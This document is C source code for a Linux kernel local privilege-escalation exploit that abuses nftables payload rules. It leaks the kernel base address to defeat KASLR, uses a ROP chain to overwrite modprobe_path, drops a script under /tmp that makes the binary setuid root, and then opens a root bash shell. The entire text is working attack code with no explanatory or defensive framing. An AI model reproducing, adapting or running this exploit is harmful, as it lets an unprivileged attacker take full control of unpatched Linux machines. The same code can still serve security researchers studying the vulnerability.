void tcp_handler(int s) {
  int len;
  char buf[0x100];

  while (true) {
    len = recv(s, buf, sizeof(buf), 0);
    if (len == sizeof(buf) && kernel_base == 0) {
      memcpy( & kernel_base, buf, sizeof(kernel_base));
      kernel_base -= TCP_WRITE_XMIT_OFF;
      break;
    }
  }
}

void rop(uint64_t * rop_buf) {
  int rop_len = 0;

  rop_buf[rop_len++] = kernel_base + 0x083820; // pop rdi; ret; 
  rop_buf[rop_len++] = kernel_base + 0x1654D81; // &modprobe_path
  rop_buf[rop_len++] = kernel_base + 0x08378f; // pop rbp; ret; 
  rop_buf[rop_len++] = 0x2f706d74;
  rop_buf[rop_len++] = kernel_base + 0x56dcb3; // mov dword ptr [rdi], ebp; clc; jmp qword ptr [rsi + 0xf]; 
}

void eop() {
  FILE * modprobe_fp, * script_fp, * trigger_fp;
  char modprobe_path[0x100], exe_path[0x400] = {};
  char * argv[3] = {};

  // loop until modprobe_path overwritten
  while (true) {
    modprobe_fp = fopen("/proc/sys/kernel/modprobe", "r");
    if (modprobe_fp == NULL) {
      exit(EXIT_FAILURE);
    }
    if (fgets(modprobe_path, sizeof(modprobe_path), modprobe_fp) == NULL) {
      exit(EXIT_FAILURE);
    }
    fclose(modprobe_fp);

    if (strcmp(modprobe_path, "/sbin/modprobe\n")) {
      break;
    }
    sleep(1);
  }

  // create script to be executed by root
  if (readlink("/proc/self/exe", exe_path, sizeof(exe_path)) < 0) {
    exit(EXIT_FAILURE);
  }
  script_fp = fopen("/tmp/modprobe", "w+");
  if (script_fp == NULL) {
    exit(EXIT_FAILURE);
  }
  fprintf(script_fp, "#!/bin/sh\n");
  fprintf(script_fp, "chown root:root \"%s\"\n", exe_path);
  fprintf(script_fp, "chmod u+s \"%s\"\n", exe_path);
  fclose(script_fp);
  chmod("/tmp/modprobe", 0755);

  // create trigger script
  trigger_fp = fopen("/tmp/DxNtuO", "w+");
  if (trigger_fp == NULL) {
    exit(EXIT_FAILURE);
  }
  fwrite("\xff\xff\xff\xff", sizeof(char), 4, trigger_fp);
  fclose(trigger_fp);
  chmod("/tmp/DxNtuO", 0755);

  // elevate privileges
  argv[0] = "/tmp/DxNtuO";
  execv(argv[0], argv);

  printf("[*] Cleaning up...\n");
  unlink("/tmp/modprobe");
  unlink("/tmp/DxNtuO");

  printf("[*] Getting root shell...\n");
  argv[0] = exe_path;
  argv[1] = "DxNtuO";
  execv(argv[0], argv);

  exit(EXIT_SUCCESS);
}

void shell() {
  setresuid(0, 0, 0);
  system("bash");
  exit(EXIT_SUCCESS);
}

int main(int argc, char * argv[]) {
  int s;
  char buf[0x100];
  pthread_t thread_id;
  struct nftnl_rule * rule;
  struct nftnl_expr * expr;
  uint32_t pktlen = 0x134;
  nftpwn_base_chain_param base_param = {
    .hooknum = NF_INET_LOCAL_OUT,
    .prio = 0
  };

  if (argc > 1) {
    shell();
  }
  if (fork()) {
    eop();
  }

  printf("[*] Initializing...\n");
  if (setup_sandbox() < 0) {
    exit(EXIT_FAILURE);
  }

  memset(buf, 0x41, sizeof(buf));
  system("ip link set dev lo up");
  pthread_create( & thread_id, NULL, tcp_server, tcp_handler);
  sleep(1);

  // Get kernel base
  printf("[*] Bypassing KASLR...\n");
  nftpwn_add_table(NFPROTO_IPV4, "table1", NULL, 0);
  nftpwn_add_chain(NFPROTO_IPV4, "table1", "chain1", & base_param);

  rule = nftnl_rule_alloc();
  nftpwn_rule_add_payload_set(rule, NFT_PAYLOAD_NETWORK_HEADER, 52, 0xf0, 0x3fffffd6);
  nftpwn_add_rule(NFPROTO_IPV4, "table1", "chain1", rule);

  tcp_send(buf, sizeof(buf));
  sleep(3);

  if (kernel_base == 0 || (kernel_base & 0xfffff)) {
    printf("[-] Failed to get kernel base\n");
    exit(EXIT_FAILURE);
  }
  nftpwn_del_chain(NFPROTO_IPV4, "table1", "chain1");
  printf("    Kernel base: %p\n", kernel_base);

  // Code execution
  printf("[*] Overwriting modprobe...\n");
  nftpwn_add_table(NFPROTO_IPV4, "table1", NULL, 0);
  nftpwn_add_chain(NFPROTO_IPV4, "table1", "chain1", & base_param);
  nftpwn_add_chain(NFPROTO_IPV4, "table1", "chain2", NULL);

  rule = nftnl_rule_alloc();
  nftpwn_rule_add_meta_get(rule, NFT_META_LEN, NFT_REG32_00);
  nftpwn_rule_add_cmp(rule, NFT_CMP_EQ, NFT_REG32_00, & pktlen, sizeof(pktlen));
  nftpwn_rule_add_immediate_verdict(rule, NFT_JUMP, "chain2");
  nftpwn_add_rule(NFPROTO_IPV4, "table1", "chain1", rule);

  rule = nftnl_rule_alloc();
  nftpwn_rule_add_payload(rule, NFT_PAYLOAD_NETWORK_HEADER, 52, 0xf0, 0x3fffffd6);
  nftpwn_add_rule(NFPROTO_IPV4, "table1", "chain2", rule);

  rop((uint64_t * ) buf);
  tcp_send(buf, sizeof(buf));

  // Should never reach here

  return 0;
}
